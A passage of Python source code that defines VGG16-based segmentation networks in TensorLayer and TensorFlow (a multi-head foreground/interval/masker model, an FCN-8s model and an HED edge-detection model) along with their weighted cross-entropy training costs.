network2 = tl.layers.BatchNormLayer(network2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
network2 = tl.layers.PoolLayer(network2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
network3 = tl.layers.Conv2dLayer(network2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
network3 = tl.layers.Conv2dLayer(network3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
network3 = tl.layers.Conv2dLayer(network3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
network3 = tl.layers.BatchNormLayer(network3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
network3 = tl.layers.PoolLayer(network3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
network4 = tl.layers.Conv2dLayer(network3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
network4 = tl.layers.Conv2dLayer(network4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
network4 = tl.layers.Conv2dLayer(network4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
network4 = tl.layers.BatchNormLayer(network4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
network4 = tl.layers.PoolLayer(network4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
""" conv5 """
network5 = tl.layers.Conv2dLayer(network4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_1')
network5 = tl.layers.Conv2dLayer(network5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_2')
network5 = tl.layers.Conv2dLayer(network5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_3')
network5 = tl.layers.BatchNormLayer(network5, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn5')
network5 = tl.layers.PoolLayer(network5, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool5') #outputsize: [H/32,W/32]
'#########################Upsample and merge##########################'
'''top-down 5'''
network5_conv = tl.layers.Conv2dLayer(network5, shape = [3, 3, 512, 64], act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_conv')
network5_up = tl.layers.UpSampling2dLayer(network5_conv,
size = [data_shape[0]//16,data_shape[1]//16],method =0,is_scale = False,name = 'upsample5' ) # output:[H/16,W/16,64]
'''top-down 4'''
network4_conv = tl.layers.Conv2dLayer(network4, shape = [3, 3, 512, 64], act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_conv')
network_cmb4_5 = tl.layers.ConcatLayer([network4_conv,network5_up],
concat_dim = 3, name = 'concat_4_5') # output:[H/16,W/16,128]
network4_up = tl.layers.UpSampling2dLayer(network_cmb4_5,
size = [data_shape[0]//8,data_shape[1]//8], method =0,is_scale = False,name = 'upsample4' ) # output:[H/8,W/8,128]
'''top-down 3'''
network3_conv = tl.layers.Conv2dLayer(network3, shape = [3, 3, 256, 64], act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_conv') # output:[H/8,W/8,64]
network_cmb3_4 = tl.layers.ConcatLayer([network3_conv,network4_up],
concat_dim = 3, name = 'concat_3_4')# output:[H/8,W/8,192]
network3_up = tl.layers.UpSampling2dLayer(network_cmb3_4,
size = [data_shape[0]//4,data_shape[1]//4], method =0,is_scale = False,name = 'upsample3' ) # output:[H/4,W/4,192]
'''top-down 2'''
network2_conv = tl.layers.Conv2dLayer(network2, shape = [3, 3, 128, 64],act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_conv') # output:[H/4,W/4,64]
network_cmb2_3 = tl.layers.ConcatLayer([network2_conv,network3_up],
concat_dim = 3, name = 'concat_2_3')# output:[H/4,W/4,256]
network2_up = tl.layers.UpSampling2dLayer(network_cmb2_3,
size = [data_shape[0]//2,data_shape[1]//2], method =0,is_scale = False,name = 'upsample2' ) # output:[H/2,W/2,256]
'''top-down 1'''
network1_conv = tl.layers.Conv2dLayer(network1, shape = [3, 3, 64, 64], act = tf.nn.relu, # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_conv') # output:[H/2,W/2,64]
network_cmb1_2 = tl.layers.ConcatLayer([network1_conv,network2_up],
concat_dim = 3, name = 'concat1_2')# output:[H/2,W/2,320]
network1_up = tl.layers.UpSampling2dLayer(network_cmb1_2,
size = [data_shape[0],data_shape[1]], method =0,is_scale = False,name = 'upsample1' ) # output:[H,W,320]
"""## cost of classification3"""
network_foreground = tl.layers.Conv2dLayer(network1_up,
shape = [3, 3, 320, 160], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='score3_feaconv') # output: (?, 14, 14, 64)
network_foreground = tl.layers.Conv2dLayer(network_foreground,
shape = [3, 3, 160, 2], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='output3') # output: (?, 14, 14, 64)
network_interval = tl.layers.Conv2dLayer(network2_up,
shape = [3, 3, 256, 128], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='score_interval_feaconv') # output: (?, 14, 14, 64)
network_interval = tl.layers.Conv2dLayer(network_interval,
shape = [3, 3, 128, 2], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='output_interval') # output: (?, 14, 14, 64)
network_interval =tl.layers.UpSampling2dLayer(network_interval,
size = [data_shape[0],data_shape[1]],
method =0,
is_scale = False,
name = 'output_interval_up' )
network_masker = tl.layers.Conv2dLayer(network3_up,
shape = [3, 3, 192, 96], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='score_masker_feaconv') # output: (?, 14, 14, 64)
network_masker = tl.layers.Conv2dLayer(network_masker,
shape = [3, 3, 96, 2], # 64 features for each 5x5 patch
strides=[1, 1, 1, 1],
padding='SAME',
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
name ='output_masker') # output: (?, 14, 14, 64)
network_masker =tl.layers.UpSampling2dLayer(network_masker,
size = [data_shape[0],data_shape[1]],
method =0,
is_scale = False,
name = 'output_masker_up' )
if is_train:
"""## cost of classification2"""
## merge all classification
network_final = Mergelayer([network_foreground,network_interval,network_masker],
name = 'mergeall' )
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*data_shape[0]*data_shape[1],2])
fw = tf.reshape(fw,[batch_size*data_shape[0]*data_shape[1]])
fw = fw*data_shape[0]*data_shape[1]*batch_size/tf.reduce_sum(fw)
im = tf.reshape(im,[batch_size*data_shape[0]*data_shape[1],2])
iw = tf.reshape(iw,[batch_size*data_shape[0]*data_shape[1]])
iw = iw*data_shape[0]*data_shape[1]*batch_size/tf.reduce_sum(iw)
mm= tf.reshape(mm,[batch_size*data_shape[0]*data_shape[1],2])
mw = tf.reshape(mw,[batch_size*data_shape[0]*data_shape[1]])
mw = mw*data_shape[0]*data_shape[1]*batch_size/tf.reduce_sum(mw)
#================cost foreground================================
y_foreground = network_foreground.outputs
y_foreground = tf.reshape(y_foreground,[batch_size*data_shape[0]*data_shape[1],2])
y_foreground_prob = tf.nn.softmax(y_foreground,name='softmax_foreground')
y_foreground_class = tf.argmax(y_foreground_prob, 1)
y_foreground_class = tf.reshape(y_foreground_class,[batch_size,data_shape[0],data_shape[1],1])
cost_foreground = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_foreground_prob),1),fw))
#================cost interval================================
y_interval = network_interval.outputs
y_interval = tf.reshape(y_interval,[batch_size*data_shape[0]*data_shape[1],2])
y_interval_prob = tf.nn.softmax(y_interval,name='softmax_interval')
y_interval_class = tf.argmax(y_interval_prob, 1)
y_interval_class = tf.reshape(y_interval_class,[batch_size,data_shape[0],data_shape[1],1])
cost_interval = -tf.reduce_mean(tf.multiply(tf.reduce_sum(im*tf.log(y_interval_prob),1),iw))
#================cost interval================================
y_masker = network_masker.outputs
y_masker = tf.reshape(y_masker,[batch_size*data_shape[0]*data_shape[1],2])
y_masker_prob = tf.nn.softmax(y_masker,name='softmax_interval')
y_masker_class = tf.argmax(y_masker_prob, 1)
y_masker_class = tf.reshape(y_masker_class,[batch_size,data_shape[0],data_shape[1],1])
cost_masker = -tf.reduce_mean(tf.multiply(tf.reduce_sum(mm*tf.log(y_masker_prob),1),mw))
#================fg & interval================================
y_refine_class = tf.logical_and(tf.cast(y_foreground_class,tf.bool),tf.logical_not(tf.cast(y_interval_class,tf.bool)))
cost = c[0]*cost_foreground+c[1]*cost_interval+c[2]*cost_masker
#================costall================================
return network_final,cost,y_foreground_class,y_interval_class, y_masker_class, y_refine_class
else:
network_final = Mergelayer([network_foreground,network_interval,network_masker],
name = 'mergeall' )
y_foreground = network_foreground.outputs
y_foreground = tf.reshape(y_foreground,[batch_size*data_shape[0]*data_shape[1],2])
y_foreground_prob = tf.nn.softmax(y_foreground,name='softmax_foreground')
y_foreground_class = tf.argmax(y_foreground_prob, 1)
y_foreground_prob = tf.reshape(y_foreground_prob,[batch_size, data_shape[0],data_shape[1],2])
y_foreground_prob = tf.slice(y_foreground_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_foreground_class = tf.reshape(y_foreground_class,[batch_size, data_shape[0],data_shape[1],1])
y_interval = network_interval.outputs
y_interval = tf.reshape(y_interval,[batch_size*data_shape[0]*data_shape[1],2])
y_interval_prob = tf.nn.softmax(y_interval,name='softmax_interval')
y_interval_class = tf.argmax(y_interval_prob, 1)
y_interval_class = tf.reshape(y_interval_class,[batch_size,data_shape[0],data_shape[1],1])
y_masker = network_masker.outputs
y_masker = tf.reshape(y_masker,[batch_size*data_shape[0]*data_shape[1],2])
y_masker_prob = tf.nn.softmax(y_masker,name='softmax_interval')
y_masker_class = tf.argmax(y_masker_prob, 1)
y_masker_class = tf.reshape(y_masker_class,[batch_size,data_shape[0],data_shape[1],1])
y_refine_class = tf.logical_and(tf.cast(y_foreground_class,tf.bool),tf.logical_not(tf.cast(y_interval_class,tf.bool)))
y_refine_prob = tf.multiply(y_foreground_prob,tf.cast(y_refine_class,tf.float32))
return network_final, y_foreground_class, y_foreground_prob, y_interval_class, y_masker_class, y_refine_class, y_refine_prob
def model_VGG16_FCN8s(x, y_,fw, batch_size, data_shape, reuse=False, mean_file_name=None,is_train = True, network_scopename = "VGG16_FCN8s" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
nx = data_shape[0]
ny = data_shape[1]
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
conv1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
conv1 = tl.layers.Conv2dLayer(conv1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
conv1 = tl.layers.BatchNormLayer(conv1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
pool1 = tl.layers.PoolLayer(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
conv2 = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
conv2 = tl.layers.Conv2dLayer(conv2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
conv2 = tl.layers.BatchNormLayer(conv2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
pool2 = tl.layers.PoolLayer(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
conv3 = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
conv3 = tl.layers.BatchNormLayer(conv3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
pool3 = tl.layers.PoolLayer(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
conv4 = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
conv4 = tl.layers.BatchNormLayer(conv4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
pool4 = tl.layers.PoolLayer(conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
""" conv5 """
conv5 = tl.layers.Conv2dLayer(pool4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_1')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_2')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_3')
conv5 = tl.layers.BatchNormLayer(conv5, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn5')
pool5 = tl.layers.PoolLayer(conv5, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool5')
fc6 = tl.layers.Conv2d(pool5, 256, (7, 7), act=tf.nn.relu, name='fc6')
#================drop=======================================
drop6 = tl.layers.DropoutLayer(fc6, keep=0.8, name='drop6',is_train=is_train)
fc7 = tl.layers.Conv2d(drop6, 256, (1, 1), act=tf.nn.relu, name='fc7')
#================drop=======================================
drop7 = tl.layers.DropoutLayer(fc7, keep=0.8, name='drop7',is_train=is_train)
score_fr = tl.layers.Conv2d(drop7 , 2, (1, 1), name='score_fr')
upscore2 = tl.layers.DeConv2d(score_fr, 2, (4, 4), (nx/16, ny/16), (2, 2), name='upscore2')
score_pool4 = tl.layers.Conv2d(pool4, 2, (1, 1), name='score_pool4')
fuse_pool4 = tl.layers.ElementwiseLayer([upscore2, score_pool4], combine_fn = tf.add, name='fuse_pool4')
upscore_pool4 = tl.layers.DeConv2d(fuse_pool4, 2, (4, 4), (nx/8, ny/8), (2, 2), name='upscore_pool4')
score_pool3 = tl.layers.Conv2d(pool3, 2, (1, 1), name='score_pool3')
fuse_pool3 = tl.layers.ElementwiseLayer([upscore_pool4, score_pool3], combine_fn = tf.add, name='fuse_pool3')
network = tl.layers.DeConv2d(fuse_pool3, 2, (16, 16), (nx, ny), (8, 8), name='upscore8')
if is_train:
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*nx*ny,2])
fw = tf.reshape(fw,[batch_size*nx*ny])
y = network.outputs
y = tf.reshape(y,[batch_size*nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
cost = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_prob),1),fw))
return network,cost,y_class
else:
y = network.outputs
y = tf.reshape(y,[nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_prob = tf.reshape(y_prob,[batch_size, data_shape[0],data_shape[1],2])
y_prob = tf.slice(y_prob,[0,0,0,1],[batch_size, data_shape[0],data_shape[1],1])
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
return network,y_class, y_prob
def model_VGG16_HED(x, y_,fw, batch_size, data_shape, reuse=False, mean_file_name=None,is_train = True, network_scopename = "VGG16_HED" ):
if mean_file_name!=None:
meanval = np.load(mean_file_name)
x = image_preprocess(x,meanval)
nx = data_shape[0]
ny = data_shape[1]
gamma_init=tf.random_normal_initializer(2., 0.1)
with tf.variable_scope(network_scopename, reuse=reuse):
tl.layers.set_name_reuse(reuse)
network_input = tl.layers.InputLayer(x, name='input')
""" conv1 """
conv1 = tl.layers.Conv2dLayer(network_input, shape = [3, 3, 3, 64],
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_1')
conv1 = tl.layers.Conv2dLayer(conv1, shape = [3, 3, 64, 64], # 64 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv1_2')
conv1 = tl.layers.BatchNormLayer(conv1, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn1')
pool1 = tl.layers.PoolLayer(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],padding='SAME',
pool = tf.nn.max_pool, name ='pool1') #outputsize: [H/2,W/2]
""" conv2 """
conv2 = tl.layers.Conv2dLayer(pool1, shape = [3, 3, 64, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_1')
conv2 = tl.layers.Conv2dLayer(conv2, shape = [3, 3, 128, 128], # 128 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv2_2')
conv2 = tl.layers.BatchNormLayer(conv2, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn2')
pool2 = tl.layers.PoolLayer(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool2') #outputsize: [H/4,W/4]
""" conv3 """
conv3 = tl.layers.Conv2dLayer(pool2, shape = [3, 3, 128, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_1')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_2')
conv3 = tl.layers.Conv2dLayer(conv3, shape = [3, 3, 256, 256], # 256 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv3_3')
conv3 = tl.layers.BatchNormLayer(conv3, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn3')
pool3 = tl.layers.PoolLayer(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool3') #outputsize: [H/8,W/8]
""" conv4 """
conv4 = tl.layers.Conv2dLayer(pool3, shape = [3, 3, 256, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_1')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_2')
conv4 = tl.layers.Conv2dLayer(conv4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
strides = [1, 1, 1, 1], padding='SAME', name ='conv4_3')
conv4 = tl.layers.BatchNormLayer(conv4, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn4')
pool4 = tl.layers.PoolLayer(conv4, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', pool = tf.nn.max_pool, name ='pool4') #outputsize: [H/16,W/16]
""" conv5 """
conv5 = tl.layers.Conv2dLayer(pool4, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_1')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_2')
conv5 = tl.layers.Conv2dLayer(conv5, shape = [3, 3, 512, 512], # 512 features for each 3x3 patch
W_init=tf.contrib.layers.xavier_initializer_conv2d(uniform=True, seed=None, dtype=tf.float32),
b_init = tf.constant_initializer(value=0.0),
strides = [1, 1, 1, 1], padding='SAME', name ='conv5_3')
conv5 = tl.layers.BatchNormLayer(conv5, act = tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='bn5')
score_dsn1 = tl.layers.Conv2d(conv1, 2, (1, 1), name='score_dsn1')
score_dsn2 = tl.layers.Conv2d(conv2, 1, (1, 1), name='score_dsn2')
upsample_2 = tl.layers.DeConv2d(score_dsn2, 2, (4, 4), (nx, ny), (2, 2), name='upsample_2')
score_dsn3 = tl.layers.Conv2d(conv3, 1, (1, 1), name='score_dsn3')
upsample_3 = tl.layers.DeConv2d(score_dsn3, 2, (8, 8), (nx, ny), (4, 4), name='upsample_3')
score_dsn4 = tl.layers.Conv2d(conv4, 1, (1, 1), name='score_dsn4')
upsample_4 = tl.layers.DeConv2d(score_dsn4, 2, (16, 16), (nx, ny), (8, 8), name='upsample_4')
score_dsn5 = tl.layers.Conv2d(conv5, 1, (1, 1), name='score_dsn5')
upsample_5 = tl.layers.DeConv2d(score_dsn5, 2, (32, 32), (nx, ny), (16, 16), name='upsample_5')
concatall = tl.layers.ConcatLayer([score_dsn1,upsample_2,upsample_3,upsample_4,upsample_5], 3, name='concatall')
network = tl.layers.Conv2d(concatall, 2, (1, 1), name='output')
if is_train:
#================Groundtruth==========================
y_ = tf.reshape(y_,[batch_size*nx*ny,2])
fw = tf.reshape(fw,[batch_size*nx*ny])
y1 = score_dsn1.outputs
y1 = tf.reshape(y1,[batch_size*nx*ny,2])
y1_prob = tf.nn.softmax(y1)
cost1 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y1_prob),1),fw))
y2 = upsample_2.outputs
y2 = tf.reshape(y2,[batch_size*nx*ny,2])
y2_prob = tf.nn.softmax(y2)
cost2 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y2_prob),1),fw))
y3 = upsample_3.outputs
y3 = tf.reshape(y3,[batch_size*nx*ny,2])
y3_prob = tf.nn.softmax(y3)
cost3 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y3_prob),1),fw))
y4 = upsample_4.outputs
y4 = tf.reshape(y4,[batch_size*nx*ny,2])
y4_prob = tf.nn.softmax(y4)
cost4 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y4_prob),1),fw))
y5 = upsample_5.outputs
y5 = tf.reshape(y5,[batch_size*nx*ny,2])
y5_prob = tf.nn.softmax(y5)
cost5 = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y5_prob),1),fw))
y = network.outputs
y = tf.reshape(y,[batch_size*nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
y_class = tf.reshape(y_class,[batch_size,nx,ny,1])
cost_fuse = -tf.reduce_mean(tf.multiply(tf.reduce_sum(y_*tf.log(y_prob),1),fw))
cost = cost1+cost2+cost3+cost4+cost5+5*cost_fuse
return network,cost,y_class
else:
y = network.outputs
y = tf.reshape(y,[nx*ny,2])
y_prob = tf.nn.softmax(y)
y_class = tf.argmax(y_prob, 1)
